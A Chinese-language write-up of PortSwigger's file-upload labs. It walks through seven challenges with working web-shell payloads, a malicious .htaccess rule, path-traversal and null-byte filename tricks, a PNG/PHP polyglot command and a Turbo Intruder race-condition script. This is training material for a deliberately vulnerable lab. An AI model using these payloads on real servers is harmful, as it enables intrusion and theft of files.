Portswigger靶場上傳漏洞實驗
portswigger靶場上傳漏洞實驗
通過webshell上傳遠端程式碼並執行
靶場
file-upload-remote-code-execution-via-web-shell-upload
說明
This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter
題解
題目要求獲取檔案內容,新建檔案編寫php程式碼
<?php echo file_get_contents('/home/carlos/secret'); ?>
在個人資訊圖片上傳處上傳該檔案
訪問該圖片連結/files/avatars/evil.php
獲取檔案內容並提交
繞過Content-Type限制的上傳漏洞
靶場
file-upload-web-shell-upload-via-content-type-restriction-bypass
說明
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter
題解
進入個人資訊頁面上傳頭像處嘗試上傳包含此程式碼的php檔案,響應提示只允許型別為image/png
<?php echo file_get_contents('/home/carlos/secret'); ?>
修改請求頭
Content-Type: image/png
訪問影象圖片,獲得檔案內容,提交通過
通過路徑遍歷上傳Webshell
Web shell upload via path traversal
靶場
file-upload-web-shell-upload-via-path-traversal
說明
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter
題解
進入個人資訊頁面上傳頭像處嘗試上傳包含此程式碼的php檔案
<?php echo file_get_contents('/home/carlos/secret'); ?>
訪問圖片,發現php程式碼被原封不動的打印出來,說明該目錄下的php檔案不會被執行
修改上傳檔案的POST請求。Content-Disposition裡filename欄位值在其之前加上一個../ 嘗試提交
發現伺服器響應和不加前無區別,猜測伺服器對/做了過濾,使用url編碼%2f代替/,嘗試提交,伺服器響應../檔案.php上傳成功
訪問該圖片,獲取檔案內容,提交通過
繞過副檔名黑名單上傳Webshell
Web shell upload via extension blacklist bypass
靶場
file-upload-web-shell-upload-via-extension-blacklist-bypass
說明
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
題解
進入個人資訊頁面上傳頭像處嘗試上傳包含此程式碼的php檔案
<?php echo file_get_contents('/home/carlos/secret'); ?>
伺服器響應提醒不允許上傳php檔案,修改請求,修改檔名為.htaccess
修改Content-Tyoe為text/plain
修改檔案內容為:
AddType application/x-httpd-php .l33t
提交請求,Apache伺服器會將這個.htaccess檔案作為配置檔案並載入其內容,將.l33t拓展名檔案作為php執行
再次提交php檔案,在此之前將其拓展名從.php改為.l33t,嘗試提交
訪問該圖片,獲取檔案內容,提交通過
通過混淆副檔名上傳Webshell
Web shell upload via obfuscated file extension
靶場
file-upload-web-shell-upload-via-obfuscated-file-extension
說明
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
題解
進入個人資訊頁面上傳頭像處嘗試上傳包含此程式碼的php檔案
<?php echo file_get_contents('/home/carlos/secret'); ?>
伺服器響應,只接受png或jpg格式的檔案
- Add semicolons or URL-encoded null byte characters before the file extension. If validation is written in a high-level language like PHP or Java, but the server processes the file using lower-level functions in C/C++, for example, this can cause discrepancies in what is treated as the end of the filename:
exploit.asp;.jpgorexploit.asp%00.jpg
如果驗證程式是用高階語言(如php)編寫而檔案處理是由較為低階的語言(c/c++)編寫,%00空字元可能會被截斷為檔名的結尾
修改請求檔名為.php%00.png,提交,注意到伺服器響應The file avatars/evil.php has been uploaded
訪問該圖片,獲取檔案內容,提交通過
通過上傳多語言Webshell的遠端程式碼執行
Remote code execution via polyglot web shell upload
靶場
file-upload-remote-code-execution-via-polyglot-web-shell-upload
說明
This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
題解
進入個人資訊頁面上傳頭像處嘗試上傳包含此程式碼的php檔案
<?php echo file_get_contents('/home/carlos/secret'); ?>
伺服器響應:只接受png/jpg格式的檔案
windows下將png圖片和php木馬合併
copy png.png/b + php.php/a = pngphp.php
上傳此pngphp.php檔案,伺服器在讀取檔案的時候根據其二進位制特徵判斷為png檔案
訪問該圖片,因為其後綴為php,伺服器會將其程式碼執行,在圖片亂碼的最後,發現一串正常的字母數字字串即為題目要求的檔案內容
通過競爭條件上傳 Webshell
Web shell upload via race condition
靶場
file-upload-web-shell-upload-via-race-condition
說明
This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
提示
The vulnerable code that introduces this race condition is as follows:
<?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];
// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);
if (checkViruses($target_file) && checkFileType($target_file)) {
echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {
unlink($target_file);
echo "Sorry, there was an error uploading your file.";
http_response_code(403);
}
function checkViruses($fileName) {
// checking for viruses
...
}
function checkFileType($fileName) {
$imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));
if($imageFileType != "jpg" && $imageFileType != "png") {
echo "Sorry, only JPG & PNG files are allowed\n";
return false;
} else {
return true;
}
}
?>
題解
進入個人資訊頁面上傳頭像處嘗試上傳包含此程式碼的php檔案
<?php echo file_get_contents('/home/carlos/secret'); ?>
響應提示只接收png/jpg檔案
檢視題目提示的原始碼,在檢查檔案前,會暫時將檔案儲存,檢查不通過才會把檔案刪除,在這php檢查程式碼的幾十毫秒內若有檢視此頭像請求,將會觸發競爭條件漏洞
使用repeater手動傳送速度是不夠快的
在burpsuite中安裝Turbo Intruder外掛,編寫指令碼程式碼
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,concurrentConnections=10,) # 設定併發連線數
request1 = ''' 提交php木馬的請求 '''
request2 = ''' 檢視頭像的請求 '''
engine.queue(request1, gate='racel') # 新增木馬提交請求佇列
for i in range(5):
engine.queue(request2, gate='racel') # 新增五條圖片請求佇列
engine.openGate('racel') # 按佇列傳送
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
執行攻擊,檢視結果,其中檢視圖片請求的有三條響應狀態碼為200,檢視這三條響應,獲得密碼字串,提交通過